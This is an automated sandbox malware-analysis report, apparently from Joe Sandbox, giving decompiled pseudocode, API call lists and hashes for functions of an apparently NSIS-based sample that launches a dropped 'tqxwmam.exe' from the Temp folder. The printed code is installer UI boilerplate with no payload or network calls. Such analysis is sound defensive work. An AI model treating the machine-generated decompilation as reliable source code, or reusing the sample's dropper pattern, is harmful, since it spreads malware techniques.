				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                    0x00401faa
                                                    0x00401faf
                                                    0x00401fb5
                                                    0x00401fba
                                                    0x00401fbe
                                                    0x0040292e
                                                    0x00401fc4
                                                    0x00401fc7
                                                    0x00401fca
                                                    0x00401fd2
                                                    0x00401fe1
                                                    0x00401fe3
                                                    0x00401fe3
                                                    0x00401fd4
                                                    0x00401fd8
                                                    0x00401fd8
                                                    0x00401fd2
                                                    0x00401fea
                                                    0x00401feb
                                                    0x00401feb
                                                    0x00402c2d
                                                    0x00402c39

                                                    APIs
                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                      • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                      • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                      • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                      • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                    • String ID:
                                                    • API String ID: 2972824698-0
                                                    • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                    • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                    • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                    • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                    0x00405811
                                                    0x00405817
                                                    0x00405821
                                                    0x00405824
                                                    0x004059ba
                                                    0x004059de
                                                    0x004059de
                                                    0x004059f1
                                                    0x00405a0f
                                                    0x00405a11
                                                    0x00405a19
                                                    0x00405a6f
                                                    0x00405a73
                                                    0x00000000
                                                    0x00000000
                                                    0x00405a75
                                                    0x00405a7b
                                                    0x00000000
                                                    0x00000000
                                                    0x00405a85
                                                    0x00405a8d
                                                    0x00405a90
                                                    0x00405b92
                                                    0x00000000
                                                    0x00405b92
                                                    0x00405a9f
                                                    0x00405aaa
                                                    0x00405ab3
                                                    0x00405abe
                                                    0x00405ac1
                                                    0x00405aca
                                                    0x00405ad0
                                                    0x00405ad3
                                                    0x00405ad3
                                                    0x00405aeb
                                                    0x00405af4
                                                    0x00405af7
                                                    0x00405afe
                                                    0x00405b05
                                                    0x00405b0d
                                                    0x00405b0d
                                                    0x00405b24
                                                    0x00405b24
                                                    0x00405b2b
                                                    0x00405b31
                                                    0x00405b3d
                                                    0x00405b44
                                                    0x00405b4d
                                                    0x00405b4f
                                                    0x00405b52
                                                    0x00405b61
                                                    0x00405b64
                                                    0x00405b6a
                                                    0x00405b6b
                                                    0x00405b71
                                                    0x00405b72
                                                    0x00405b73
                                                    0x00405b7b
                                                    0x00405b86
                                                    0x00405b8c
                                                    0x00405b8c
                                                    0x00000000
                                                    0x00405aeb
                                                    0x00405a21
                                                    0x00405a51
                                                    0x00405a59
                                                    0x00405a64
                                                    0x00405a64
                                                    0x00405a6a
                                                    0x00000000
                                                    0x00405a6a
                                                    0x00405a25
                                                    0x00405a2f
                                                    0x00000000
                                                    0x004059f3
                                                    0x004059f9
                                                    0x00405a34
                                                    0x00000000
                                                    0x00405a3d
                                                    0x00405a02
                                                    0x00405a07
                                                    0x00405a0a
                                                    0x00000000
                                                    0x00405a0a
                                                    0x004059f1
                                                    0x0040582a
                                                    0x0040582e
                                                    0x00405836
                                                    0x0040583a
                                                    0x0040583d
                                                    0x00405840
                                                    0x00405843
                                                    0x00405846
                                                    0x00405847
                                                    0x00405848
                                                    0x00405861
                                                    0x00405864
                                                    0x0040586e
                                                    0x0040587d
                                                    0x00405885
                                                    0x0040588d
                                                    0x00405892
                                                    0x00405895
                                                    0x004058a1
                                                    0x004058aa
                                                    0x004058b3
                                                    0x004058d5
                                                    0x004058db
                                                    0x004058ec
                                                    0x004058f1
                                                    0x004058ff
                                                    0x0040590d
                                                    0x0040590d
                                                    0x00405912
                                                    0x00405920
                                                    0x00405920
                                                    0x00405925
                                                    0x00405928
                                                    0x0040592d
                                                    0x00405939
                                                    0x00405942
                                                    0x0040594f
                                                    0x0040595e
                                                    0x00405951
                                                    0x00405956
                                                    0x00405956
                                                    0x0040596a
                                                    0x0040596a
                                                    0x0040597e
                                                    0x00405987
                                                    0x00405990
                                                    0x004059a0
                                                    0x004059ac
                                                    0x004059ac
                                                    0x00000000

                                                    APIs
                                                    • GetDlgItem.USER32 ref: 00405867
                                                    • GetDlgItem.USER32 ref: 00405876
                                                    • GetClientRect.USER32 ref: 004058B3
                                                    • GetSystemMetrics.USER32 ref: 004058BA
                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                    • ShowWindow.USER32(?,00000008), ref: 00405956
                                                    • GetDlgItem.USER32 ref: 00405977
                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                    • GetDlgItem.USER32 ref: 00405885
                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                    • GetDlgItem.USER32 ref: 004059C9
                                                    • CreateThread.KERNEL32 ref: 004059D7
                                                    • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                    • ShowWindow.USER32(00000000), ref: 00405A02
                                                    • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                    • ShowWindow.USER32(00000008), ref: 00405A51
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                    • CreatePopupMenu.USER32 ref: 00405A96
                                                    • AppendMenuW.USER32 ref: 00405AAA
                                                    • GetWindowRect.USER32 ref: 00405ACA
                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                    • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                    • EmptyClipboard.USER32 ref: 00405B31
                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                    • GlobalLock.KERNEL32 ref: 00405B47
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                    • SetClipboardData.USER32 ref: 00405B86
                                                    • CloseClipboard.USER32 ref: 00405B8C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                    • String ID: H7B${
                                                    • API String ID: 590372296-2256286769
                                                    • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                    • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                    • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                    • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                    0x00404ab5
                                                    0x00404abb
                                                    0x00404ac1
                                                    0x00404ace
                                                    0x00404adc
                                                    0x00404adf
                                                    0x00404ae7
                                                    0x00404aed
                                                    0x00404aed
                                                    0x00404af9
                                                    0x00404afc
                                                    0x00404b6a
                                                    0x00404b71
                                                    0x00404c48
                                                    0x00404c4f
                                                    0x00404c5e
                                                    0x00404c5e
                                                    0x00404c62
                                                    0x00404c6c
                                                    0x00404c79
                                                    0x00404c7b
                                                    0x00404c7b
                                                    0x00404c89
                                                    0x00404c90
                                                    0x00404c97
                                                    0x00404c9a
                                                    0x00404cd6
                                                    0x00404cd8
                                                    0x00404cde
                                                    0x00404ce3
                                                    0x00404ce7
                                                    0x00404ce9
                                                    0x00404ce9
                                                    0x00404d05
                                                    0x00000000
                                                    0x00404d07
                                                    0x00404d0a
                                                    0x00404d18
                                                    0x00404d1e
                                                    0x00404d1f
                                                    0x00404d22
                                                    0x00404d25
                                                    0x00000000
                                                    0x00404d25
                                                    0x00404c9c
                                                    0x00404c9e
                                                    0x00404ca2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00404ca4
                                                    0x00404ca4
                                                    0x00404cb1
                                                    0x00404cb6
                                                    0x00000000
                                                    0x00000000
                                                    0x00404cba
                                                    0x00404cbc
                                                    0x00404cbc
                                                    0x00404cc5
                                                    0x00404cc7
                                                    0x00404ccc
                                                    0x00404ccf
                                                    0x00404cd4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00404cd4
                                                    0x00404d31
                                                    0x00404d3b
                                                    0x00404d3e
                                                    0x00404d41
                                                    0x00404d48
                                                    0x00404d48
                                                    0x00404d4a
                                                    0x00404d4a
                                                    0x00404d4f
                                                    0x00404d51
                                                    0x00404d59
                                                    0x00404d60
                                                    0x00404d62
                                                    0x00404d6d
                                                    0x00404d6d
                                                    0x00404d62
                                                    0x00404d7d
                                                    0x00404d87
                                                    0x00404d8f
                                                    0x00404daa
                                                    0x00404d91
                                                    0x00404d9a
                                                    0x00404d9a
                                                    0x00404d8f
                                                    0x00404daf
                                                    0x00404db4
                                                    0x00404db9
                                                    0x00404dc2
                                                    0x00404dc2
                                                    0x00404dcb
                                                    0x00404dcd
                                                    0x00404dcd
                                                    0x00404dd9
                                                    0x00404de1
                                                    0x00404deb
                                                    0x00404deb
                                                    0x00404df0
                                                    0x00000000
                                                    0x00404df0
                                                    0x00404c9a
                                                    0x00404c51
                                                    0x00404c58
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00404c58
                                                    0x00404b77
                                                    0x00404b80
                                                    0x00404b9a
                                                    0x00404b9f
                                                    0x00404ba9
                                                    0x00404bb0
                                                    0x00404bbc
                                                    0x00404bbf
                                                    0x00404bc2
                                                    0x00404bc9
                                                    0x00404bd1
                                                    0x00404bd4
                                                    0x00404bd8
                                                    0x00404bdf
                                                    0x00404be7
                                                    0x00404c41
                                                    0x00404be9
                                                    0x00404bea
                                                    0x00404bf1
                                                    0x00404bfb
                                                    0x00404c03
                                                    0x00404c10
                                                    0x00404c24
                                                    0x00404c28
                                                    0x00404c28
                                                    0x00404c24
                                                    0x00404c2d
                                                    0x00404c3a
                                                    0x00404c3a
                                                    0x00404be7
                                                    0x00000000
                                                    0x00404b9f
                                                    0x00404b8d
                                                    0x00000000
                                                    0x00000000
                                                    0x00404b93
                                                    0x00000000
                                                    0x00404afe
                                                    0x00404b0b
                                                    0x00404b14
                                                    0x00404b21
                                                    0x00404b21
                                                    0x00404b28
                                                    0x00404b2e
                                                    0x00404b37
                                                    0x00404b3a
                                                    0x00404b3d
                                                    0x00404b45
                                                    0x00404b48
                                                    0x00404b4b
                                                    0x00404b51
                                                    0x00404b58
                                                    0x00404b5f
                                                    0x00404df6
                                                    0x00404e08
                                                    0x00404b65
                                                    0x00404b68
                                                    0x00000000
                                                    0x00404b68
                                                    0x00404b5f

                                                    APIs
                                                    • GetDlgItem.USER32 ref: 00404B04
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                    • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00423748,00000000,?,?), ref: 00404C1C
                                                    • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj), ref: 00404C28
                                                    • SetDlgItemTextW.USER32 ref: 00404C3A
                                                      • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                      • Part of subcall function 004068EF: CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                    • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                      • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                      • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                      • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
